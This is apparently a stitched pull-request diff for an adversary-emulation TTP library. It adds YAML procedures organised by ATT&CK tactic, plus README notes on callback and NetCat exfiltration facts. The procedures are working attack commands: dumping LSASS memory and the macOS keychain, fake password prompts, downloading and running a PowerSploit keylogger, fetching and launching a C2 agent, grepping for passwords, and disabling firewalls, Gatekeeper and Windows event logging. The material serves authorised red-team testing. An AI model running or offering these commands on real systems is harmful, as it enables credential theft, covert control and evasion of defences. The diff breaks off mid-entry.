### PR TITLE
Disable Windows EventLog via EventCleaner

### DIFF
--- a/README.md
+++ b/README.md
@@ -91,6 +91,15 @@ Automatic facts are environmental and are applied to an agent based on condition
 * **agent.name**: current name given to the agent
 * **agent.location**: absolute file path of the agent file on disk
 
+### Custom variables
+
+Custom facts are user defined facts that can be arbitrarily defined. In general, follow the outline of `<ATT&CK Tactic>.<general description>` when defining these facts.
+
+Example for defining a custom NetCat listening post:
+* **exfiltration.netcat.ip**: IP address of the NetCat listener
+* **exfiltration.netcat.port**: Port NetCat is listening on on that server
+
+
 ## CALDERA inspired
 
 As former CALDERA leads, this project was originally forked and designed off of the MITRE Stockpile repository.

--- a/README.md
+++ b/README.md
@@ -88,6 +88,9 @@ Automatic facts are environmental and are applied to an agent based on condition
 
 * **operator.session**: a unique key for your Operator session. The session key regenerates on each restart of the app and is used internally to help validate external connections originated in the app.
 * **operator.http**: callback address of your HTTP server
+* **operator.tcp**: callback address of your TCP server
+* **operator.udp**: callback address of your UDP server
+* **operator.grpc**: callback address of your GRPC server
 * **agent.name**: current name given to the agent
 * **agent.location**: absolute file path of the agent file on disk
 

--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
 Here you will find an open-source collection of TTP files, organized by ATT&CK tactic. Each procedure describes a single action an adversary
 may attempt post-compromise of a network or system.
 
-> TTP files can be used on their own or within the Prelude Operator desktop app, where they are loaded by default on each restart. Inside Operator, you are able to import TTPs from Atomic Red Team, Caldera and other popular sources.
+> TTP files can be used on their own or within the Prelude Operator desktop app, where they are loaded by default on each restart. Inside Operator, you are able to import TTPs from Atomic Red Team, Caldera and other popular sources. [This video](https://www.youtube.com/watch?v=kY3-NBES1gk) shows how to import TTPs from external sources and [this video](https://www.youtube.com/watch?v=OWjgS8bzJf0) shows how to develop new procedures from within Operator.
 
 ## Understand the format
 

--- a/README.md
+++ b/README.md
@@ -87,6 +87,7 @@ Prelude Operator parses the results from every run command, attempting to learn 
 Automatic facts are environmental and are applied to an agent based on conditional logic.
 
 * **operator.session**: a unique key for your Operator session. The session key regenerates on each restart of the app and is used internally to help validate external connections originated in the app.
+* **operator.payloads**: callback address of your HTTP payload server (defaults to operator.http)
 * **operator.http**: callback address of your HTTP server
 * **operator.tcp**: callback address of your TCP server
 * **operator.udp**: callback address of your UDP server

--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
 Here you will find an open-source collection of TTP files, organized by ATT&CK tactic. Each procedure describes a single action an adversary
 may attempt post-compromise of a network or system.
 
-TTP files can be used on their own or within the Prelude Operator desktop app, where they are loaded by default on each restart.
+> TTP files can be used on their own or within the Prelude Operator desktop app, where they are loaded by default on each restart. Inside Operator, you are able to import TTPs from Atomic Red Team, Caldera and other popular sources.
 
 ## Understand the format
 

--- a/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml
+++ b/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml
@@ -23,6 +23,4 @@ platforms:
         subprocess.Popen(['storm', 'list']).communicate();
   linux:
     sh:
-      command: >
-        pip install -q stormssh 2>/dev/null && storm list | sed
-        's/\x1b\[[0-9;]*m//g'
+      command: pip install -q stormssh 2>/dev/null && storm list | sed 's/\x1b\[[0-9;]*m//g'

--- a/collection/385b9f52-3b9a-4f39-b0f0-926cf7625b23.yml
+++ b/collection/385b9f52-3b9a-4f39-b0f0-926cf7625b23.yml
@@ -17,8 +17,4 @@ platforms:
   windows:
     psh:
       command: |
-        gwmi win32_logicaldisk | Select -property drivetype, deviceid |
-        Foreach-Object -process {if ($_.drivetype -eq 2 -OR $_.drivetype -eq 3
-        -AND $_.deviceid -ne $env:SystemDrive) {cd $_.deviceid ; Get-ChildItem
-        -Recurse -Include *. | foreach {$_.FullName};
-        cd C:}};
+        gwmi win32_logicaldisk | Select -property drivetype, deviceid | Foreach-Object -process {if ($_.drivetype -eq 2 -OR $_.drivetype -eq 3 -AND $_.deviceid -ne $env:SystemDrive) {cd $_.deviceid ; Get-ChildItem -Recurse -Include *. | foreach {$_.FullName}; cd C:}};

--- a/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml
+++ b/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml
@@ -27,5 +27,4 @@ platforms:
   windows:
     psh:
       command: >
-        (Get-ChildItem -Path c:\pstbak\*.* -Filter *.pst | ? {$_.LastWriteTime
-        -gt (Get-Date).AddDays(-1)}).Count
+        (Get-ChildItem -Path $env:USERPROFILE\Desktop,$env:USERPROFILE\Documents -recurse | ? {-not $_.PSIsContainer -and $_.LastWriteTime -gt (Get-Date).AddDays(-1)}).FullName

--- a/command-and-control/23c5cb2f-3f6f-4770-b260-13edf23f5903.yml
+++ b/command-and-control/23c5cb2f-3f6f-4770-b260-13edf23f5903.yml
@@ -14,22 +14,22 @@ technique:
 platforms:
   windows:
     keyword:
-      command: 'config.{"Contact": "udp"}'
+      command: 'config.{"Contact": "udp", "Address": "#{operator.udp}"}'
       variants:
-        - command: 'config.{"Contact": "tcp"}'
-        - command: 'config.{"Contact": "http"}'
-        - command: 'config.{"Contact": "grcp"}'
+        - command: 'config.{"Contact": "tcp", "Address": "#{operator.tcp}"}'
+        - command: 'config.{"Contact": "http", "Address": "#{operator.http}"}'
+        - command: 'config.{"Contact": "grpc", "Address": "#{operator.grpc}"}'
   darwin:
     keyword:
-      command: 'config.{"Contact": "udp"}'
+      command: 'config.{"Contact": "udp", "Address": "#{operator.udp}"}'
       variants:
-        - command: 'config.{"Contact": "tcp"}'
-        - command: 'config.{"Contact": "http"}'
-        - command: 'config.{"Contact": "grcp"}'
+        - command: 'config.{"Contact": "tcp", "Address": "#{operator.tcp}"}'
+        - command: 'config.{"Contact": "http", "Address": "#{operator.http}"}'
+        - command: 'config.{"Contact": "grpc", "Address": "#{operator.grpc}"}'
   linux:
     keyword:
-      command: 'config.{"Contact": "udp"}'
+      command: 'config.{"Contact": "udp", "Address": "#{operator.udp}"}'
       variants:
-        - command: 'config.{"Contact": "tcp"}'
-        - command: 'config.{"Contact": "http"}'
-        - command: 'config.{"Contact": "grcp"}'
+        - command: 'config.{"Contact": "tcp", "Address": "#{operator.tcp}"}'
+        - command: 'config.{"Contact": "http", "Address": "#{operator.http}"}'
+        - command: 'config.{"Contact": "grpc", "Address": "#{operator.grpc}"}'

--- a/command-and-control/23c5cb2f-3f6f-4770-b260-13edf23f5903.yml
+++ b/command-and-control/23c5cb2f-3f6f-4770-b260-13edf23f5903.yml
@@ -1,0 +1,35 @@
+id: 23c5cb2f-3f6f-4770-b260-13edf23f5903
+metadata:
+  version: 1
+  authors:
+    - khyberspache
+  tags: []
+name: Update agent beacon protocol
+description: |
+  Tasks agent to swap C2 protocol to a different protocol.
+tactic: 'command-and-control'
+technique:
+  id: T1573.001
+  name: "Encrypted Channel: Symmetric Cryptography"
+platforms:
+  windows:
+    keyword:
+      command: 'config.{"Contact": "udp"}'
+      variants:
+        - command: 'config.{"Contact": "tcp"}'
+        - command: 'config.{"Contact": "http"}'
+        - command: 'config.{"Contact": "grcp"}'
+  darwin:
+    keyword:
+      command: 'config.{"Contact": "udp"}'
+      variants:
+        - command: 'config.{"Contact": "tcp"}'
+        - command: 'config.{"Contact": "http"}'
+        - command: 'config.{"Contact": "grcp"}'
+  linux:
+    keyword:
+      command: 'config.{"Contact": "udp"}'
+      variants:
+        - command: 'config.{"Contact": "tcp"}'
+        - command: 'config.{"Contact": "http"}'
+        - command: 'config.{"Contact": "grcp"}'

--- a/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
+++ b/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
@@ -15,13 +15,11 @@ technique:
 platforms:
   linux:
     sh:
-      command: |
-        chmod +x pneuma-linux && nohup ./pneuma-linux &
+      command: nohup ./pneuma-linux >/dev/null 2>&1 &
       payload: https://s3.amazonaws.com/operator.payloads/pneuma/pneuma-linux
   darwin:
     sh:
-      command: |
-        chmod +x pneuma-darwin && nohup ./pneuma-darwin &
+      command: nohup ./pneuma-darwin >/dev/null 2>&1 &
       payload: https://s3.amazonaws.com/operator.payloads/pneuma/pneuma-darwin
   windows:
     psh:

--- a/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
+++ b/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
@@ -23,3 +23,7 @@ platforms:
       command: |
         chmod +x pneuma-darwin && nohup ./pneuma-darwin &
       payload: https://s3.amazonaws.com/operator.payloads/pneuma/pneuma-darwin
+  windows:
+    psh:
+      command: Start-Process .\pneuma-windows.exe
+      payload: https://s3.amazonaws.com/operator.payloads/pneuma/pneuma-windows.exe

--- a/command-and-control/command_emoji_domain.yml
+++ b/command-and-control/command_emoji_domain.yml
@@ -1,0 +1,22 @@
+id: ea713bc4-63f0-501c-9a6f-0b01d560b87d
+metadata:
+  version: 1
+  authors:
+    - savvyspoon
+  tags: []
+name: Emoji Domain
+description: |
+  Query an emoji domain to test if content control tools block access, as these domains are often used in typosquatting attacks. When used in a domain name, the browser uses “punycode” to convert the emojis into complicated strings like “xn--i-7iq.ws”, which are used to take users to the corresponding website.
+tactic: exfiltration
+technique:
+  id: T1041
+  name: Exfiltration Over Command and Control Channel
+platforms:
+  global:
+    sh:
+      command: |
+        curl xn--i-7iq.ws
+  windows:
+    psh:
+      command: |
+        Invoke-RestMethod -Uri http://xn--i-7iq.ws -Method GET

--- a/credential-access/168b2b96-1413-4596-aef7-483b20f8210e.yml
+++ b/credential-access/168b2b96-1413-4596-aef7-483b20f8210e.yml
@@ -1,0 +1,22 @@
+id: 168b2b96-1413-4596-aef7-483b20f8210e
+name: Dump LSASS via comsvcs DLL
+description: >-
+  This procedure uses rundll32.exe to call the MiniDump exported function of
+  comsvcs.dll, which in turns calls MiniDumpWriteDump to dump the memory of the
+  LSASS process.
+tactic: credential-access
+technique:
+  id: T1003.001
+  name: LSASS Memory
+platforms:
+  windows:
+    psh:
+      command: >-
+        Invoke-Command -ScriptBlock {C:\\Windows\\System32\\rundll32.exe
+        C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id
+        $env:TEMP\\lsass.dmp full}
+metadata:
+  authors:
+    - bfuzzy1
+  tags: []
+  version: 1

--- a/credential-access/168b2b96-1413-4596-aef7-483b20f8210e.yml
+++ b/credential-access/168b2b96-1413-4596-aef7-483b20f8210e.yml
@@ -11,10 +11,8 @@ technique:
 platforms:
   windows:
     psh:
-      command: >-
-        Invoke-Command -ScriptBlock {C:\\Windows\\System32\\rundll32.exe
-        C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id
-        $env:TEMP\\lsass.dmp full}
+      command: |
+        Invoke-Command -ScriptBlock {C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\\lsass.dmp full}
 metadata:
   authors:
     - bfuzzy1

--- a/credential-access/4a136ba6-66f1-11eb-ae93-0242ac130002.yml
+++ b/credential-access/4a136ba6-66f1-11eb-ae93-0242ac130002.yml
@@ -1,15 +1,16 @@
 id: 4a136ba6-66f1-11eb-ae93-0242ac130002 
 metadata:
-  version: 1
+  version: 2
   authors: 
     - Abhishek S (abhiabhi2306)
   tags: []
 name: Perform direct registry loot
 description: |
   The registry can directly looted without using tools like wce,fgdump or external binaries. The dump will be saved to c:\windows\temp\system.save
+tactic: credential-access
 technique:
-  id: T1082
-  name: Command and Scripting Interpreter
+  id: T1003.002
+  name: "OS Credential Dumping: Security Account Manager"
 platforms:
   windows:
     cmd:

--- a/credential-access/5c90420e-7972-4125-833b-16c89d5c303f.yml
+++ b/credential-access/5c90420e-7972-4125-833b-16c89d5c303f.yml
@@ -63,7 +63,7 @@ platforms:
         [CredUI]::Prompt();
   linux:
     sh:
-      command: read -sp "Enter Password: " T1187 && echo $T1187 > T1187.txt
+      command: 'read -sp "Enter Password: " T1187 && echo $T1187 > T1187.txt'
 metadata:
   authors:
     - khyberspache

--- a/credential-access/5c90420e-7972-4125-833b-16c89d5c303f.yml
+++ b/credential-access/5c90420e-7972-4125-833b-16c89d5c303f.yml
@@ -1,0 +1,74 @@
+id: 5c90420e-7972-4125-833b-16c89d5c303f
+metadata:
+  authors:
+    - khyberspache
+  tags: []
+  version: 1
+name: Prompt for user credentials
+description: |
+  Displays a user authentication prompt to trick the user into providing their credentials to dump them in plaintext.
+tactic: credential-access
+technique:
+  id: T1187
+  name: Forced Authentication
+platforms:
+  windows:
+    psh:
+      command: |
+        $type=@"
+        using System;
+        using System.Text;
+        using System.Runtime.InteropServices;
+
+        public static class CredUI
+        {
+
+        	[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
+        	private struct CREDUI_INFO
+        	{
+        	     public int cbSize;
+        	     public IntPtr hwndParent;
+        	     public string pszMessageText;
+        	     public string pszCaptionText;
+        	     public IntPtr hbmBanner;
+        	}
+
+        	[DllImport("credui.dll", CharSet = CharSet.Auto)]
+        	private static extern bool CredUnPackAuthenticationBuffer(int dwFlags, IntPtr pAuthBuffer, uint cbAuthBuffer, StringBuilder pszUserName, ref int pcchMaxUserName, StringBuilder pszDomainName, ref int pcchMaxDomainame, StringBuilder pszPassword, ref int pcchMaxPassword);
+
+        	[DllImport("credui.dll", CharSet = CharSet.Auto)]
+        	private static extern int CredUIPromptForWindowsCredentials(ref CREDUI_INFO notUsedHere, int authError, ref uint authPackage, IntPtr InAuthBuffer, uint InAuthBufferSize, out IntPtr refOutAuthBuffer, out uint refOutAuthBufferSize, ref bool fSave, int flags);
+
+        	public static void Prompt() {
+        	    CREDUI_INFO credui = new CREDUI_INFO();
+        		credui.pszCaptionText = "Reauthenticate user";
+        		credui.pszMessageText = "This will allow us to grab your credentials in plaintext";
+        		credui.cbSize = Marshal.SizeOf(credui);
+        		uint authPackage = 0;
+        		IntPtr outCredBuffer = new IntPtr();
+        		uint outCredSize;
+        		bool save = false;
+        		int result = CredUIPromptForWindowsCredentials(ref credui, 0,ref authPackage,IntPtr.Zero, 0, out outCredBuffer, out outCredSize, ref save, 1 /* Generic */);
+
+        		var usernameBuf = new StringBuilder(100);
+        		var passwordBuf  = new StringBuilder(100);
+        		var domainBuf = new StringBuilder(100);
+
+        		int maxUserName = 100;
+        		int maxDomain = 100;
+        		int maxPassword = 100;
+        		if (result == 0)
+        		{
+        			if (CredUnPackAuthenticationBuffer(0, outCredBuffer, outCredSize, usernameBuf, ref maxUserName, domainBuf, ref maxDomain, passwordBuf, ref maxPassword))
+        			{
+        				Console.WriteLine("Username: {0}", usernameBuf.ToString());
+        				Console.WriteLine("Password: {0}", passwordBuf.ToString());
+        				Console.WriteLine("Domain: {0}", domainBuf.ToString());
+        				return;
+        			}
+        		}
+        	}
+        }
+        "@
+        Add-Type -TypeDefinition $type;
+        [CredUI]::Prompt();

--- a/credential-access/5c90420e-7972-4125-833b-16c89d5c303f.yml
+++ b/credential-access/5c90420e-7972-4125-833b-16c89d5c303f.yml
@@ -1,12 +1,8 @@
 id: 5c90420e-7972-4125-833b-16c89d5c303f
-metadata:
-  authors:
-    - khyberspache
-  tags: []
-  version: 1
 name: Prompt for user credentials
-description: |
-  Displays a user authentication prompt to trick the user into providing their credentials to dump them in plaintext.
+description: >
+  Displays a user authentication prompt to trick the user into providing their
+  credentials to dump them in plaintext.
 tactic: credential-access
 technique:
   id: T1187
@@ -19,10 +15,8 @@ platforms:
         using System;
         using System.Text;
         using System.Runtime.InteropServices;
-
         public static class CredUI
         {
-
         	[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
         	private struct CREDUI_INFO
         	{
@@ -32,13 +26,10 @@ platforms:
         	     public string pszCaptionText;
         	     public IntPtr hbmBanner;
         	}
-
         	[DllImport("credui.dll", CharSet = CharSet.Auto)]
         	private static extern bool CredUnPackAuthenticationBuffer(int dwFlags, IntPtr pAuthBuffer, uint cbAuthBuffer, StringBuilder pszUserName, ref int pcchMaxUserName, StringBuilder pszDomainName, ref int pcchMaxDomainame, StringBuilder pszPassword, ref int pcchMaxPassword);
-
         	[DllImport("credui.dll", CharSet = CharSet.Auto)]
         	private static extern int CredUIPromptForWindowsCredentials(ref CREDUI_INFO notUsedHere, int authError, ref uint authPackage, IntPtr InAuthBuffer, uint InAuthBufferSize, out IntPtr refOutAuthBuffer, out uint refOutAuthBufferSize, ref bool fSave, int flags);
-
         	public static void Prompt() {
         	    CREDUI_INFO credui = new CREDUI_INFO();
         		credui.pszCaptionText = "Reauthenticate user";
@@ -49,11 +40,9 @@ platforms:
         		uint outCredSize;
         		bool save = false;
         		int result = CredUIPromptForWindowsCredentials(ref credui, 0,ref authPackage,IntPtr.Zero, 0, out outCredBuffer, out outCredSize, ref save, 1 /* Generic */);
-
         		var usernameBuf = new StringBuilder(100);
         		var passwordBuf  = new StringBuilder(100);
         		var domainBuf = new StringBuilder(100);
-
         		int maxUserName = 100;
         		int maxDomain = 100;
         		int maxPassword = 100;
@@ -72,3 +61,12 @@ platforms:
         "@
         Add-Type -TypeDefinition $type;
         [CredUI]::Prompt();
+  linux:
+    sh:
+      command: read -sp "Enter Password: " T1187 && echo $T1187 > T1187.txt
+metadata:
+  authors:
+    - khyberspache
+    - bfuzzy1
+  tags: []
+  version: 2

--- a/credential-access/5c90420e-7972-4125-833b-16c89d5c303f.yml
+++ b/credential-access/5c90420e-7972-4125-833b-16c89d5c303f.yml
@@ -66,10 +66,8 @@ platforms:
       command: 'read -sp "Enter Password: " T1187 && echo $T1187 > T1187.txt'
   darwin:
     osa:
-      command: >-
-        tell app "System Preferences" to display dialog "System Preferences
-        requires your password to finish applying updates." & return & return 
-        default answer "" with icon 1 with hidden answer
+      command: |
+        tell app "System Preferences" to display dialog "System Preferences requires your password to finish applying updates." & return & return default answer "" with icon 1 with hidden answer
 metadata:
   authors:
     - khyberspache

--- a/credential-access/5c90420e-7972-4125-833b-16c89d5c303f.yml
+++ b/credential-access/5c90420e-7972-4125-833b-16c89d5c303f.yml
@@ -64,9 +64,15 @@ platforms:
   linux:
     sh:
       command: 'read -sp "Enter Password: " T1187 && echo $T1187 > T1187.txt'
+  darwin:
+    osa:
+      command: >-
+        tell app "System Preferences" to display dialog "System Preferences
+        requires your password to finish applying updates." & return & return 
+        default answer "" with icon 1 with hidden answer
 metadata:
   authors:
     - khyberspache
     - bfuzzy1
   tags: []
-  version: 2
+  version: 3

--- a/credential-access/740a8d86-cf25-4daf-9e66-0e5ffcb1042a.yml
+++ b/credential-access/740a8d86-cf25-4daf-9e66-0e5ffcb1042a.yml
@@ -1,0 +1,26 @@
+id: 740a8d86-cf25-4daf-9e66-0e5ffcb1042a
+name: Find credentials in files
+description: This procedure will extract plaintext credentials in files.
+tactic: credential-access
+technique:
+  id: T1552
+  name: Unsecured Credentials
+platforms:
+  linux:
+    sh:
+      command: grep -ri password #{directory.T1083}
+  windows:
+    cmd:
+      command: findstr /si password *.xml *.ini *.txt *.config 2>nul
+    psh:
+      command: |-
+        findstr /si pass *.xml *.doc *.txt *.xls;
+        ls -R | select-string -Pattern password
+  darwin:
+    sh:
+      command: grep -ri password #{directory.T1083}
+metadata:
+  authors:
+    - bfuzzy1
+  tags: []
+  version: 1

--- a/credential-access/740a8d86-cf25-4daf-9e66-0e5ffcb1042a.yml
+++ b/credential-access/740a8d86-cf25-4daf-9e66-0e5ffcb1042a.yml
@@ -8,17 +8,17 @@ technique:
 platforms:
   linux:
     sh:
-      command: grep -ri password #{directory.T1083}
+      command: 'grep -ri password #{directory.T1083}'
   windows:
     cmd:
       command: findstr /si password *.xml *.ini *.txt *.config 2>nul
     psh:
-      command: |-
+      command: |
         findstr /si pass *.xml *.doc *.txt *.xls;
-        ls -R | select-string -Pattern password
+        ls -R | select-string -Pattern password;
   darwin:
     sh:
-      command: grep -ri password #{directory.T1083}
+      command: 'grep -ri password #{directory.T1083}'
 metadata:
   authors:
     - bfuzzy1

--- a/credential-access/b1846e2d-197f-4828-8514-c6c52f870d1a.yml
+++ b/credential-access/b1846e2d-197f-4828-8514-c6c52f870d1a.yml
@@ -1,0 +1,21 @@
+id: b1846e2d-197f-4828-8514-c6c52f870d1a
+name: PowerSploit Get-Keystrokes
+description: >-
+  This procedure will capture keys pressed, time and active window for 60
+  seconds and log the collected keystrokes in the C:\ directory.
+tactic: credential-access
+technique:
+  id: T1056.001
+  name: Keylogging
+platforms:
+  windows:
+    pwsh:
+      command: >-
+        powershell.exe -exec bypass -C "IEX (New-Object
+        Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1');
+        Get-Keystrokes -LogPath C:\key.log -Timeout 60"
+metadata:
+  authors:
+    - bfuzzy1
+  tags: []
+  version: 1

--- a/credential-access/b1846e2d-197f-4828-8514-c6c52f870d1a.yml
+++ b/credential-access/b1846e2d-197f-4828-8514-c6c52f870d1a.yml
@@ -10,10 +10,8 @@ technique:
 platforms:
   windows:
     pwsh:
-      command: >-
-        powershell.exe -exec bypass -C "IEX (New-Object
-        Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1');
-        Get-Keystrokes -LogPath C:\key.log -Timeout 60"
+      command: |
+        powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1'); Get-Keystrokes -LogPath C:\key.log -Timeout 60"
 metadata:
   authors:
     - bfuzzy1

--- a/credential-access/e4c27d72-0233-41ae-90b5-bd8ec6e697bc.yml
+++ b/credential-access/e4c27d72-0233-41ae-90b5-bd8ec6e697bc.yml
@@ -1,0 +1,19 @@
+id: e4c27d72-0233-41ae-90b5-bd8ec6e697bc
+name: Dump Keychain
+description: >-
+  This procedure will dump all passwords stored in the default keychain. This
+  procedure will prompt for a password (unless the keychain is already
+  unlocked).
+tactic: credential-access
+technique:
+  id: T1555.001
+  name: Keychain
+platforms:
+  darwin:
+    sh:
+      command: security dump-keychain -d login.keychain > T1555_001.txt
+metadata:
+  authors:
+    - bfuzzy1
+  tags: []
+  version: 1

--- a/defense-evasion/03aa0a55-5052-4c02-909e-7d244f3083e1.yml
+++ b/defense-evasion/03aa0a55-5052-4c02-909e-7d244f3083e1.yml
@@ -1,0 +1,17 @@
+id: 03aa0a55-5052-4c02-909e-7d244f3083e1
+metadata:
+  version: 1
+  authors:
+    - khyberspache
+  tags: []
+name: Stop agent process
+description: |
+  Sends a command to the agent that it should gracefully exit the running process.
+tactic: defense-evasion
+technique:
+  id: T1480
+  name: Execution Guardrails
+platforms:
+  global:
+    keyword:
+      command: exit

--- a/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml
+++ b/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml
@@ -4,6 +4,7 @@ metadata:
   authors:
     - privateducky
     - MITRE
+    - Abhishek S (abhiabhi2306)
   tags: []
 name: Avoid logs
 description: |
@@ -18,13 +19,19 @@ platforms:
     sh:
       command: |
         > $HOME/.zsh_history && unset HISTFILE
+      variants:
+        - command: history -c
   linux:
     sh:
       command: |
         > $HOME/.bash_history && unset HISTFILE
+      variants:
+        - command: history -c
   windows:
     psh:
       command: |
         Clear-Eventlog Security;
         Clear-Eventlog System;
         Clear-History;Clear;
+
+

--- a/defense-evasion/4c9a443f-796d-4b79-a452-9c68ec85188a.yml
+++ b/defense-evasion/4c9a443f-796d-4b79-a452-9c68ec85188a.yml
@@ -1,0 +1,19 @@
+id: 4c9a443f-796d-4b79-a452-9c68ec85188a
+name: Disable Security Updates
+description: This procedure disables the installation of security updates.
+tactic: defense-evasion
+technique:
+  id: T1562.001
+  name: Disable or Modify Tools
+platforms:
+  darwin:
+    sh:
+      command: >-
+        defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist
+        CriticalUpdateInstall -bool NO
+metadata:
+  authors:
+    - bfuzzy1
+  tags:
+    - destructive
+  version: 1

--- a/defense-evasion/4c9a443f-796d-4b79-a452-9c68ec85188a.yml
+++ b/defense-evasion/4c9a443f-796d-4b79-a452-9c68ec85188a.yml
@@ -8,9 +8,8 @@ technique:
 platforms:
   darwin:
     sh:
-      command: >-
-        defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist
-        CriticalUpdateInstall -bool NO
+      command: |
+        defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist CriticalUpdateInstall -bool NO
 metadata:
   authors:
     - bfuzzy1

--- a/defense-evasion/70a57910-a56a-4b60-bcb4-84b7a56076ab.yml
+++ b/defense-evasion/70a57910-a56a-4b60-bcb4-84b7a56076ab.yml
@@ -1,8 +1,7 @@
 id: 70a57910-a56a-4b60-bcb4-84b7a56076ab
-name: ' Disable Microsoft Defender firewall'
+name: 'Disable Microsoft Defender firewall'
 description: >-
-  This procedure will disable the Microsoft Defender Firewall for the current
-  profile.
+  This procedure will disable the Microsoft Defender Firewall for all profiles.
 tactic: defense-evasion
 technique:
   id: T1562.004
@@ -10,9 +9,15 @@ technique:
 platforms:
   windows:
     cmd:
-      command: netsh advfirewall set currentprofile state off
+      command: |
+        netsh advfirewall set allprofiles state off
+    psh:
+      command: |
+        Set-NetFirewallProfile -All -Enabled False
 metadata:
   authors:
     - bfuzzy1
-  tags: []
-  version: 1
+    - w0rk3r
+  tags:
+    - destructive
+  version: 2

--- a/defense-evasion/70a57910-a56a-4b60-bcb4-84b7a56076ab.yml
+++ b/defense-evasion/70a57910-a56a-4b60-bcb4-84b7a56076ab.yml
@@ -1,0 +1,18 @@
+id: 70a57910-a56a-4b60-bcb4-84b7a56076ab
+name: ' Disable Microsoft Defender firewall'
+description: >-
+  This procedure will disable the Microsoft Defender Firewall for the current
+  profile.
+tactic: defense-evasion
+technique:
+  id: T1562.004
+  name: Disable or Modify System Firewall
+platforms:
+  windows:
+    cmd:
+      command: netsh advfirewall set currentprofile state off
+metadata:
+  authors:
+    - bfuzzy1
+  tags: []
+  version: 1

--- a/defense-evasion/76de9c5c-899f-4d48-8651-2a17e93c5bd9.yml
+++ b/defense-evasion/76de9c5c-899f-4d48-8651-2a17e93c5bd9.yml
@@ -1,0 +1,19 @@
+id: 76de9c5c-899f-4d48-8651-2a17e93c5bd9
+name: Disable EventLog Service Startup
+description: |
+  Modify the EventLog Service Startup Type to Disabled, preventing the service from starting after a reboot
+tactic: defense-evasion
+technique:
+  id: T1562.002
+  name: "Impair Defenses: Disable Windows Event Logging"
+platforms:
+  windows:
+    psh:
+      command: |
+        Set-Service EventLog -StartupType Disabled
+metadata:
+  authors:
+    - w0rk3r
+  tags: 
+    - destructive
+  version: 1

--- a/defense-evasion/ba4452fa-b662-49ef-bd1e-3859b95bcfb6.yml
+++ b/defense-evasion/ba4452fa-b662-49ef-bd1e-3859b95bcfb6.yml
@@ -1,0 +1,18 @@
+id: ba4452fa-b662-49ef-bd1e-3859b95bcfb6
+name: Execute pneuma agent via Windows Shell Common Dll
+description: >-
+  This procedure uses rundll32.exe to call the ShellExec_RunDLL function of
+  shell32.dll to execute an agent on the host.
+tactic: defense-evasion
+technique:
+  id: T1218
+  name: Signed Binary Proxy Execution
+platforms:
+  windows:
+    cmd:
+      command: rundll32.exe shell32.dll,ShellExec_RunDLL "#{agent.location}"
+metadata:
+  authors:
+    - bfuzzy1
+  tags: []
+  version: 1

--- a/defense-evasion/f0b13547-6f1a-418a-9331-ce08b0fed707.yml
+++ b/defense-evasion/f0b13547-6f1a-418a-9331-ce08b0fed707.yml
@@ -1,0 +1,19 @@
+id: f0b13547-6f1a-418a-9331-ce08b0fed707
+name: Disable macOS Gatekeeper
+description: >-
+  This procedure will disable Gatekeeper and allow execution of untrusted
+  software on the system.
+tactic: defense-evasion
+technique:
+  id: T1562.001
+  name: Disable or Modify Tools
+platforms:
+  darwin:
+    sh:
+      command: sudo spctl --master-disable
+metadata:
+  authors:
+    - bfuzzy1
+  tags:
+    - destructive
+  version: 1

--- a/discovery/0e016565-f44f-4735-bfec-b714b87ee4b7.yml
+++ b/discovery/0e016565-f44f-4735-bfec-b714b87ee4b7.yml
@@ -1,0 +1,17 @@
+id: 0e016565-f44f-4735-bfec-b714b87ee4b7
+metadata:
+  version: 1
+  authors: 
+    - Abhishek S (abhiabhi2306)
+  tags: []
+name: Retrieve in memory passwords
+description: |
+  This technique can be used to retrieve passwords from the main memory character device image file (/dev/mem)
+tactic: discovery
+technique:
+  id: T1082
+  name: System Information Discovery
+platforms:
+  linux:
+    sh:
+      command: strings /dev/mem -n10 | grep -i PASS

--- a/discovery/1789c69f-854f-4517-9542-2a861a1829a3.yml
+++ b/discovery/1789c69f-854f-4517-9542-2a861a1829a3.yml
@@ -1,0 +1,21 @@
+id: 1789c69f-854f-4517-9542-2a861a1829a3
+name: Powershell Transcript Configuration Check
+description: |
+  Check if Powershell Transcript is Enabled
+tactic: discovery
+technique:
+  id: T1518.001
+  name: "Software Discovery: Security Software Discovery"
+platforms:
+  windows:
+    psh:
+      command: |
+        [Bool](Get-ItemProperty 'HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription' -ErrorAction SilentlyContinue).EnableTranscripting
+    cmd:
+      command: |
+        reg query HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription
+metadata:
+  authors:
+    - w0rk3r
+  tags: []
+  version: 1

--- a/discovery/19d4a157-b388-44ff-9597-e61bfc44a3e7.yml
+++ b/discovery/19d4a157-b388-44ff-9597-e61bfc44a3e7.yml
@@ -1,0 +1,18 @@
+id: 19d4a157-b388-44ff-9597-e61bfc44a3e7
+metadata:
+  version: 1
+  authors: 
+    - Abhishek S (abhiabhi2306)
+  tags: []
+name: Print kernel diagnostic information
+description: |
